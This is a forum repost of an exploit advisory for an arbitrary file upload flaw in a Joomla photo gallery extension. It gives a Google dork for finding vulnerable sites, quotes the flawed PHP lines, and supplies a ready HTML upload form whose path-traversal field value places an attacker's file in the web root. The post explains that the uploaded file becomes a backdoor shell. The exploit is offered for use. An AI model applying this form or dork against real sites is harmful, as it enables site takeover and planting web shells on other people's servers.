Aerosol Posted April 1, 2015 Report Posted April 1, 2015 ####################################################################### Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload# Google Dork: inurl:com_simplephotogallery# Date: 10.03.2015# Exploit Author: CrashBandicot @DoSPerl# OSVDB-ID: 119624# My Github: github.com/CCrashBandicot# Vendor Homepage: [url]https://www.apptha.com/[/url]# Software Link: [url]https://www.apptha.com/category/extension/joomla/simple-photo-gallery[/url]# Version: 1# Tested on: Windows####################################################################### Vulnerable File : uploadFile.php# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php20. $fieldName = 'uploadfile';87. $fileTemp = $_FILES[$fieldName]['tmp_name'];94. $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;96. if(! move_uploaded_file($fileTemp, $uploadPath))# Exploit :<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" > <input type="file" name="uploadfile"><br> <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br> <input type="submit" name="Submit" value="Pwn!"></form># Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php)# Shell Path : [url]http://localhost/backdoor__[/url][RandomString].phpSource Quote
